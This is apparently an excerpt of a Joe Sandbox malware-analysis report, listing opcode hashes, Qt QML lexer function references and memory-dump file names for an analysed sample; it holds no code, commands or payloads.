                                                                                                            • Opcode ID: 5b2e79da5235e63ed0461b925189b91b187654602b2fb9902553e3b536586b29
                                                                                                            • Instruction ID: edb9c71f11650d4e5f1312b79e91e68c77be4bf7043f810cefdcaa57289ce887
                                                                                                            • Opcode Fuzzy Hash: 5b2e79da5235e63ed0461b925189b91b187654602b2fb9902553e3b536586b29
                                                                                                            • Instruction Fuzzy Hash: 700192B4A053018BD7B4EF2DDC4561A77E1BF88304F858D6CD89487228EB7A86889B57
                                                                                                            APIs
                                                                                                            • ?lex@Lexer@QQmlJS@@QAEHXZ.BDXSBR8DCE ref: 00C22778
                                                                                                              • Part of subcall function 00C224D0: ?scanToken@Lexer@QQmlJS@@AAEHXZ.BDXSBR8DCE(00000000,?,?,00C0095D), ref: 00C224ED
                                                                                                            • ?lex@Lexer@QQmlJS@@QAEHXZ.BDXSBR8DCE ref: 00C22798
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Lexer@$?lex@$?scanToken@
                                                                                                            • String ID: pragma
                                                                                                            • API String ID: 3365654242-487986730
                                                                                                            • Opcode ID: 33a01784ef6ae4d66727bd67c44db2e8fa5da90df3fdb1f9a0039ae6714b14ab
                                                                                                            • Instruction ID: bb96c2355c8f58777a254cdc1b73c9a8dca4254ff77596f3545533245d5f7d10
                                                                                                            • Opcode Fuzzy Hash: 33a01784ef6ae4d66727bd67c44db2e8fa5da90df3fdb1f9a0039ae6714b14ab
                                                                                                            • Instruction Fuzzy Hash: BF0144301083606FD324FE28E88196BB7E1AF51714F50092EF4E182AA2D770AD88D742